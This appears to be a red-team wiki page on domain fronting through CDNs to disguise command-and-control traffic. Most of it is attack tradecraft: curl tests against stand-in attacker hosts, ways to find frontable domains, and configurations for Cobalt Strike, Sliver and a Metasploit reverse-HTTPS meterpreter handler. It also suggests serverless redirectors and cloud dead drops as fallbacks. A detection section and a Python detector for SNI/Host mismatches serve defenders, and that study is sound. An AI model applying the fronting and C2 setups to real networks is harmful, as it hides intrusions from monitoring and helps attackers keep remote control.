# CDN - Domain Fronting

Domain fronting abuses shared CDN infrastructure to disguise C2 traffic: the outer TLS connection (and its SNI) names a legitimate domain hosted on the CDN, while the inner HTTP Host header names the attacker-controlled origin, so network monitoring only sees a connection to the legitimate domain.

## How It Works

```
1. Attacker's C2 and legitimate site share same CDN (e.g., CloudFront)
2. TLS SNI (outer) shows: legitimate-site.com
3. HTTP Host header (inner) shows: attacker-c2.com
4. CDN routes based on Host header, not SNI
5. Network monitoring sees traffic to "legitimate-site.com"
```

## Finding Frontable Domains

### Automated Discovery

```bash
# FindFrontableDomains
# https://github.com/rvrsh3ll/FindFrontableDomains
python3 FindFrontableDomains.py -d target-cdn.net

# Domain Fronting Tools
# https://github.com/stevecoward/domain-fronting-tools
python3 finder.py --cdn cloudfront

# DomainFrontingLists (pre-compiled lists)
# https://github.com/vysecurity/DomainFrontingLists
```

### Manual Testing

```bash
# Test if domain fronting works
# Replace SNI with legitimate domain, Host with your domain

# Using curl
curl -H "Host: your-c2.cloudfront.net" https://legitimate.cloudfront.net/

# If you get response from your-c2 → Domain fronting works

# Test with different CDNs
for domain in $(cat frontable_domains.txt); do
    curl -s -H "Host: your-c2.com" "https://$domain/" | head -1
done
```

## CDN-Specific Techniques

### Amazon CloudFront

```bash
# Find CloudFront distributions
dig domain.com | grep cloudfront

# Test fronting
curl -H "Host: attacker.cloudfront.net" https://legitimate.cloudfront.net/path

# Note: AWS has restricted domain fronting as of 2018
# But some edge cases may still work
```

### Azure CDN

```bash
# Azure Front Door domains
*.azurefd.net
*.azureedge.net

# Test
curl -H "Host: attacker.azurefd.net" https://legitimate.azurefd.net/
```

### Google Cloud CDN

```bash
# Google has blocked domain fronting since 2018
# Alternative: Use App Engine with custom domains
```

### Fastly

```bash
# Fastly domains
*.fastly.net
*.global.ssl.fastly.net

curl -H "Host: attacker.global.ssl.fastly.net" https://legitimate.global.ssl.fastly.net/
```

### Cloudflare

```bash
# Cloudflare domains
*.cloudflare.com

# Note: Cloudflare has mitigations in place
# Workers may be alternative approach
```

## TLS 1.3 Considerations

```bash
# TLS 1.3 encrypts more of the handshake
# SNI is still visible unless using ECH (Encrypted Client Hello)

# Noctilucent - TLS 1.3 Domain Fronting
# https://github.com/SixGenInc/Noctilucent
# Exploits TLS 1.3 session resumption
```

## C2 Framework Integration

### Cobalt Strike

```
# Malleable C2 profile for domain fronting
http-get {
    set uri "/search";
    client {
        header "Host" "your-c2.cloudfront.net";
    }
}

# Listener setup:
# Host: legitimate.cloudfront.net
# Host Header: your-c2.cloudfront.net
```

### Sliver

```bash
# Generate implant with domain fronting
sliver > https -d legitimate.cloudfront.net -H your-c2.cloudfront.net

# Or in implant config
sliver > generate --http legitimate.cloudfront.net --http-header "Host:your-c2.cloudfront.net"
```

### Metasploit

```bash
# Reverse HTTPS with domain fronting
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST your-c2.cloudfront.net
set HttpHostHeader legitimate.cloudfront.net
set OverrideRequestHost true
```

## Detection & Defense

```
# Indicators to monitor:
1. Mismatch between TLS SNI and HTTP Host header (the core indicator; only visible where TLS is terminated/inspected)
2. Unusual CDN traffic patterns (beaconing intervals, new CDN tenants never seen before)
3. Long-lived HTTPS sessions to CDN edges
4. POST requests to CDN (vs typical GET for static content)

# Defensive measures:
1. Block known CDN IP ranges (drastic, breaks legitimate sites on the same CDN)
2. SSL/TLS inspection to compare SNI vs Host (without decryption the Host header is not observable)
3. Monitor for C2 framework signatures in traffic
4. Analyze CDN logs for suspicious patterns
```
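The SNI/Host mismatch check above is the one most worth automating. The following detector is an added example written for this page, not code from the original or from any of the tools it lists: it scores connection records (constructed inline; in practice they would come from a TLS-inspecting proxy or from joining Zeek `ssl.log` and `http.log` on the connection id) for indicators 1, 3 and 4. The CDN suffix list, the 600-second session threshold and the scoring weights are assumptions chosen for the demo. It also handles the caveat that a naive "same registered domain" whitelist would hide fronting between two tenants of one CDN suffix such as `cloudfront.net`.

```python
"""Flag TLS/HTTP records whose SNI and Host header disagree, plus other
domain-fronting indicators (POST to a CDN edge, long-lived sessions).

Records are constructed here; a real deployment would feed it proxy logs or
a Zeek ssl.log/http.log join.  Suffixes, thresholds and weights are
illustrative assumptions, not vendor-published values.
"""
from dataclasses import dataclass, field

# Suffixes of CDN edge hostnames mentioned on this page (illustrative, not exhaustive).
CDN_SUFFIXES = (".cloudfront.net", ".azurefd.net", ".azureedge.net", ".fastly.net")

LONG_SESSION_SECONDS = 600  # assumption: a static-asset fetch rarely stays open 10 minutes


@dataclass
class Session:
    uid: str          # connection id, as in a Zeek log
    src: str          # client address
    sni: str          # server_name from the TLS ClientHello (outer name)
    host: str         # Host header seen after TLS termination (inner name)
    method: str       # HTTP method
    duration: float   # seconds the connection stayed open
    resp_bytes: int   # bytes returned by the server


@dataclass
class Finding:
    uid: str
    score: int
    reasons: list = field(default_factory=list)


def normalize_name(name: str) -> str:
    """Lower-case, drop a trailing dot and an explicit port so that
    'Example.COM:443.' and 'example.com' compare equal."""
    name = name.strip().lower()
    if name.endswith("."):
        name = name[:-1]
    if ":" in name and not name.startswith("["):
        name = name.rsplit(":", 1)[0]
    return name


def registrable_domain(name: str) -> str:
    """Crude eTLD+1 (last two labels).  Enough for the demo; production code
    should use the Public Suffix List."""
    labels = normalize_name(name).split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else name


def is_cdn_host(name: str) -> bool:
    n = normalize_name(name)
    return any(n.endswith(suffix) for suffix in CDN_SUFFIXES)


def analyze(session: Session) -> Finding:
    sni, host = normalize_name(session.sni), normalize_name(session.host)
    finding = Finding(uid=session.uid, score=0)
    if sni != host:
        # Core indicator: outer (SNI) and inner (Host) names disagree.
        # Two names under one registered domain (img. vs www.) is usually benign
        # vhost reuse, but NOT when that "domain" is a CDN suffix shared by
        # unrelated tenants, which is exactly the fronting case.
        if registrable_domain(sni) == registrable_domain(host) and not is_cdn_host(sni):
            finding.score += 1
            finding.reasons.append(f"sni/host differ within {registrable_domain(sni)}")
        else:
            finding.score += 5
            finding.reasons.append(f"sni {sni!r} != host {host!r}")
    if is_cdn_host(sni) or is_cdn_host(host):
        if session.method.upper() == "POST":
            finding.score += 2
            finding.reasons.append("POST to CDN edge")
        if session.duration >= LONG_SESSION_SECONDS:
            finding.score += 2
            finding.reasons.append(f"session open {session.duration:.0f}s")
    return finding


def suspicious(sessions, threshold=5):
    """Return findings at or above the alert threshold, highest score first."""
    found = [analyze(s) for s in sessions]
    return sorted((f for f in found if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample data: three benign sessions and two matching the fronting pattern.
SAMPLE_SESSIONS = [
    Session("C1", "10.0.0.5", "d1abc.cloudfront.net", "d1abc.cloudfront.net", "GET", 1.2, 40210),
    Session("C2", "10.0.0.5", "www.example.com", "cdn.example.com", "GET", 0.8, 1024),
    Session("C3", "10.0.0.8", "legit.cloudfront.net", "c2.cloudfront.net", "POST", 1800.0, 512),
    Session("C4", "10.0.0.9", "legit.azurefd.net", "legit.azurefd.net", "GET", 0.3, 2048),
    Session("C5", "10.0.0.9", "legit.global.ssl.fastly.net", "drop.fastly.net", "GET", 4.0, 300),
]

if __name__ == "__main__":
    for f in suspicious(SAMPLE_SESSIONS):
        print(f.uid, f.score, "; ".join(f.reasons))
```

Only C3 and C5 cross the threshold: C3 combines a cross-tenant CloudFront mismatch with a POST and a 30-minute session, C5 is a bare mismatch between two Fastly tenants. C2 (two names under `example.com`) scores 1 and stays below the alert line, which is the noise reduction the registrable-domain check buys you; tune the weights against your own proxy logs before alerting on them.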

## Alternatives When Fronting Fails

```bash
# CDN as redirector
# Set up CDN to proxy to your actual C2

# Serverless redirectors
# Use Lambda@Edge, Cloudflare Workers to redirect

# Legitimate cloud services
# Use Azure Blob, S3 buckets as dead drops
```

## Tools

```bash
# Domain Fronting Finder
https://github.com/rvrsh3ll/FindFrontableDomains

# Domain Fronting Tools
https://github.com/stevecoward/domain-fronting-tools

# TLS 1.3 Fronting
https://github.com/SixGenInc/Noctilucent

# Pre-compiled Lists
https://github.com/vysecurity/DomainFrontingLists
```

## Related Topics

* [C2 Frameworks](/exploitation/web-exploits.md) - C2 framework usage
* [RT/EDR Evasion](/others/rt-edr.md) - Evasion techniques
* [SSRF](/enumeration/web/ssrf.md) - CDN can be SSRF target

